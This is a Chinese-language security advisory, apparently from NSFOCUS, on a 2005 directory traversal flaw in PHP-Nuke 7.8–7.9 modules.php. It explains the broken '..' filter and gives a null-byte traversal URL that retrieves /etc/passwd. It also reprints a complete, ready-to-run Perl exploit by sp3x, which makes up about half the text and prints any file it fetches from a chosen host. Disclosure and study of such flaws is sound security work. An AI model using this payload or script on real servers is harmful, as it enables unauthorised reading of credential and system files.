首页 -> 安全研究

安全研究

安全漏洞
PHP-Nuke modules.php远程目录遍历漏洞

发布日期:2005-10-20
更新日期:2005-10-20

受影响系统:
PHP-Nuke PHP-Nuke 7.9
PHP-Nuke PHP-Nuke 7.8
描述:
BUGTRAQ  ID: 15137

PHP-Nuke是一个广为流行的网站创建和管理工具,它可以使用很多数据库软件作为后端,比如MySQL、PostgreSQL、mSQL、Interbase、Sybase等。

PHP-Nuke中存在远程目录遍历漏洞,远程攻击者可能利用此漏洞非授权访问敏感文件。

漏洞代码位于modules.php中:

---------------------------------
...
if (!isset($file) OR $file != $_REQUEST['file']) $file="index";
if (stripos_clone($file,"..") OR stripos_clone($mop,"..")) die("You are so cool..
.");
....
-----------------------------------

函数stripos_clone()用于过滤变量$file,$mop用于检测和防范目录遍历。因此如果用户设置了变量$file,$mop开始过滤“..”。

而在mainfile.php的stripos_clone()函数中:

--------
if(!function_exists('stripos')) {
function stripos_clone($haystack, $needle, $offset=0) {
return strpos(strtoupper($haystack), strtoupper($needle), $offset);
}
} else {

function stripos_clone($haystack, $needle, $offset=0) {
return stripos($haystack, $needle, $offset=0);
}
}
--------

如果输入以下URL的话:

http://victim/[nuke_dir]/modules.php?name=Search&file=../../../../../../../../../etc/passwd%00

就可以从服务器得到/etc/passwd。

因此成功利用这个漏洞的攻击者可以非授权读取敏感信息。

<*来源:sp3x (sp3x@securityreason.com
  
  链接:http://marc.theaimsgroup.com/?l=bugtraq&m=112974252124014&w=2
*>

测试方法:

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

#!/usr/bin/perl
use IO::Socket;

# SecurityReason Exploit Code
# by sp3x
# sp3x@securityreason.com
# www.securityreason.com
# Remote Directory Traversal Exploit - Local file include
# PHPNuke -> 7.8 full patched , 7.9 fullpatched + patch 3.1
# Server must have magic_quotes_gpc = Off - need to use %00
# Copyright &#169; SecurityReason. All Rights Reserved.
#
# Example of usage : perl phpnuke-expl.pl 172.24.2.1 nukedir Search ../../../etc/passwd

if (@ARGV < 3)
{
print "\r\n";
print "SecurityReason - www.securityreason.com\r\n";
print "[sp3x] EXPLOIT for PHPNuke 7.8 - 7.9\r\n";
print " \r\n";
print "perl phpnuke-expl.pl [Host] [nuke_dir] [file]\r\n\r\n";
print "[Host] - Host where is phpnuke example: http://localhost\r\n";
print "[nuke_dir] - Directory of PHPNuke example: /phpnuke/html/\r\n";
print "[module] - Module of PHPNuke example: News\r\n";
print "[file] - file to show - example : ../../../../../etc/passwd\r\n\r\n";
print "Example of usage : perl phpnuke-expl.pl 172.24.2.1 nukedir module ../../../../../e
tc/passwd";
print "\r\n";
exit();
}

$HOST = $ARGV[0];
$DIR = $ARGV[1]."modules.php";
$MODULE = "?name=".$ARGV[2]."&";
$FILE = "file=".$ARGV[3]."%00";
$LENGTH = length $FILE;

print "\r\n[Host] : ".$HOST."\n";
print "[Dir] : ".$DIR."\n";
print "[Module] : ".$ARGV[2]."\n";
print "[File] : ".$ARGV[3]."\r\n\r\n";
$HOST =~ s/(http:\/\/)//;

$get1 = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$HOST", PeerPort => "80"

) || die "Error 404\r\n\r\n";

print $get1 "GET ".$DIR.$MODULE.$FILE." HTTP/1.0\n";
print $get1 "Host: ".$HOST."\n";

print $get1 "User-Agent: Mozilla/5.0 - SecurityReason";
print $get1 "Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/
plain;q=0.8,image/png,*/*;q=0.5";
print $get1 "Accept-Language: pl,en-us;q=0.7,en;q=0.3";
print $get1 "Accept-Encoding: gzip,deflate";
print $get1 "Accept-Charset: ISO-8859-2,utf-8;q=0.7,*;q=0.7";
print $get1 "Keep-Alive: 300";
print $get1 "Cookie: lang=english";
print $get1 "Cache-Control: max-age=0";
print $get1 "Content-Type: application/x-www-form-urlencoded\n";
print $get1 "Content-Length: ".$LENGTH."\n\n";

print $get1 $FILE;

while ($odp = <$get1>)
{
if ($odp =~ /<b>Warning<\/b>: main\(\): Unable to access .\/$ARGV[2] in <b>/ ) {
printf "\n\nFile ".$ARGV[2]." doesn't exists or something goes wrong.\r\n\r\n";

exit;
}

printf $odp;
}

建议:
厂商补丁:

PHP-Nuke
--------
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:

http://securityreason.com/download/1/4

浏览次数:4273
严重程度:0(网友投票)
本安全漏洞由绿盟科技翻译整理,版权所有,未经许可,不得转载
绿盟科技给您安全的保障